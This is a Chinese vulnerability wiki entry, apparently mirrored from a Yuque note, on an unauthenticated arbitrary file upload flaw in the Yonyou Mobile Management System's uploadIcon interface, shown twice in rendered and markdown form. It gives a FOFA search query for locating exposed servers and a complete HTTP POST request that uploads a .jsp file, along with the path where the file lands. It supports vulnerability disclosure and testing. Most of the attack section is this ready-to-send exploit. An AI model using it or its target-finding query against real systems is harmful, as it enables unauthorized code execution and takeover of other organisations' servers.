fofamini-wiki

登录白背景

源码

用友移动管理系统uploadIcon任意文件上传漏洞

一、漏洞简介

用友移动系统管理是用友公司推出的一款移动办公解决方案，旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具，方便用户在移动设备上管理和处理企业的系统和业务。用友移动管理系统 uploadIcon接口存在任意文件上传漏洞，未经授权攻击者通过漏洞上传任意文件，最终可以获取服务器权限。

二、影响版本

用友移动管理系统

三、资产测绘

fofa：app="用友-移动系统管理"
登录页面

四、漏洞复现

POST /maportal/news/uploadIcon?imgName=1 HTTP/1.1
Host: xx.xx.xx.xx
Content-Length: 199
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySbYrtv3SZkqRLRNS
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=30E66C13BE85EAFC1843D1497506E41E.server; JSESSIONID=078CECE35E09DA91C81A2ACAA0D18C3A.server
Connection: close

------WebKitFormBoundarySbYrtv3SZkqRLRNS
Content-Disposition: form-data; name="iconFile"; filename="1.jsp"
Content-Type: application/octet-stream

123
------WebKitFormBoundarySbYrtv3SZkqRLRNS—

上传文件位置

http://xx.xx.xx.xx/maupload/news/1.jsp

原文: https://www.yuque.com/xiaokp7/ocvun2/vrwbmvn35d3l2dqt

# 用友移动管理系统uploadIcon任意文件上传漏洞

# 一、漏洞简介
用友移动系统管理是用友公司推出的一款移动办公解决方案，旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具，方便用户在移动设备上管理和处理企业的系统和业务。用友移动管理系统 uploadIcon接口存在任意文件上传漏洞，未经授权攻击者通过漏洞上传任意文件，最终可以获取服务器权限。

# 二、影响版本

- 用友移动管理系统

# 三、资产测绘

- fofa：`app="用友-移动系统管理"`
- 登录页面

![image.png](./img/GR3jRNiPrmuHpr6Q/1692116995132-c3250344-57a9-4ea4-a699-2c1060a6174f-236745.png)

# 四、漏洞复现
```
POST /maportal/news/uploadIcon?imgName=1 HTTP/1.1
Host: xx.xx.xx.xx
Content-Length: 199
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySbYrtv3SZkqRLRNS
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=30E66C13BE85EAFC1843D1497506E41E.server; JSESSIONID=078CECE35E09DA91C81A2ACAA0D18C3A.server
Connection: close

------WebKitFormBoundarySbYrtv3SZkqRLRNS
Content-Disposition: form-data; name="iconFile"; filename="1.jsp"
Content-Type: application/octet-stream

123
------WebKitFormBoundarySbYrtv3SZkqRLRNS—
```
![image.png](./img/GR3jRNiPrmuHpr6Q/1693188555570-9c057586-acbd-496c-a0bc-2c6b70a56efe-712688.png)
上传文件位置
```
http://xx.xx.xx.xx/maupload/news/1.jsp
```
![image.png](./img/GR3jRNiPrmuHpr6Q/1693188588834-8ccb57d5-7579-49ce-bfa2-cae54d6f49db-189542.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vrwbmvn35d3l2dqt>